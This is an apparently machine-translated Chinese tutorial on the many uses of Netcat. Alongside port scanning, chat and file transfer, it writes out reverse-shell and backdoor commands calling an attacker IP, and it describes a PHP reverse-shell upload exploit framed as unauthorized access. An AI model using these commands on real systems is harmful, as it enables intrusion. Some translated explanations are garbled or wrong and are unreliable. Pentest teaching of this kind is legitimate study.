Netcat同时非常容易和多用途,就像试图解释你可以用瑞士军刀做的一切。
举些例子:-
- 获取标志
- 绑shell(后门)
- 聊天
- 文件上传和下载
- 端口扫描
- 港口敲门
- 转发端口
- 显示Web服务器HTTP文件内容
让我们开始吧!
Port Knocking (端口爆破)
打开kali Linux的终端并键入以下命令,其中包含目标的IP和目标端口号。
nc 192.168.1.21 2222因此,当执行给定命令时,它将通过敲击端口来告知隐藏的运行服务,从下面给出的图像可以看出端口2222是为SSH打开的。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:1 (1).png

反壳
主要是攻击者使用netcat作为后门来进行未经授权的访问目标系统,在此攻击者在扫描任何易受攻击的目标时激活侦听端口(随机端口)。
nc -e /bin/bash 192.168.1.21 4444
上面的命令将等待受害者系统的反向连接。
在给定的屏幕截图中,您可以看到正在运行的网站遭受os命令注入漏洞现在使用nc -e / bin / bash 192.168.1.21 4444在受害者和攻击者系统之间建立连接,这将允许通过创建后门进行未经授权的访问。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:3.png

在这里你可以成功地看到我们(攻击者)通过netcat访问受害者的shell。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:4.png

Netcat作为后门
下载netcat.exe for windows并输入以下命令
nc.exe 192.168.1.21 4444 -e cmd.exe
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:5.png

从给定的屏幕截图中,您可以看到攻击者通过netcat成功连接到Windows客户端
nc -lvp 4444
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:6.png

文件上传利用
我们将了解攻击者如何通过netcat shell利用文件上载漏洞。从给定的图像可以清楚地看出,目标网络服务器允许其客户端上传图像。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:7.png

对于上传,我们使用php-reverse-shell.php而不是php后门的图像。打开此Web shell以编辑监听器IP,即您的kali Linux IP(192.168.1.21),然后使用以下命令激活netcat,该命令将等待与受害者系统建立反向连接。
nc -lvp 1234
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:8.1.png

现在在web服务器上传你的php后门并执行将受害者的系统从攻击者机器连接起来的文件。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:8.png

因此,您可以看到攻击者通过netcat shell成功进行了未经授权的访问。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:9.png

HTTP请求
使用Netcat从Web服务器获取网页信息。使用Netcat,您可以搜索完整的HTTP标头,以便在Web服务器中查看正在运行的特定站点。现在键入以下命令以连接到端口80。
nc 192.168.1.11 80
OPTIONS /HTTP/ 1.0从屏幕截图中,您可以阅读目标网站的http标头的详细信息。
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:10.png

端口扫描
Netcat还可以扫描TPC和UDP端口,因此它可以用于代替NMAP,它将告诉我们目标IP的开放和关闭端口
以下命令显示目标IP和端口范围
- -z:零I / O模式[用于扫描]
- -w:连接和最终网络读取的超时
- -v:-v verbose
- -l:listen模式,用于入站连接
- -n:仅限数字的IP地址,
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:11.png

聊天
Netcat还用于两个系统之间的聊天。我们需要将Netcat放在一起监听两个系统上的特定端口并连接到特定地址。
nc -lvp 5678
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:12.png

nc 192.168.1.21 5678访问bbs.mayidui.net
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:13.png

文件传输
如你所知,在windows中我们现在已经下载了netcat.exe文件,我已经用它通过特定端口上传目标系统上的文本文件t.txt。
nc 192.168.1.21 5555 < t.txt

现在接收器可以通过提供类似的端口号来下载该t.txt文件,该端口号将在两个系统之间建立连接。
nc -lvp 5555 > /root/Desktop/t.txt
描述:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
图片:15.png

本文标题:渗透测试工具教程:瑞士军刀Netcat(nc.exe)的使用方法,Netcat实战教程
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://www.mayidui.net/t2223.html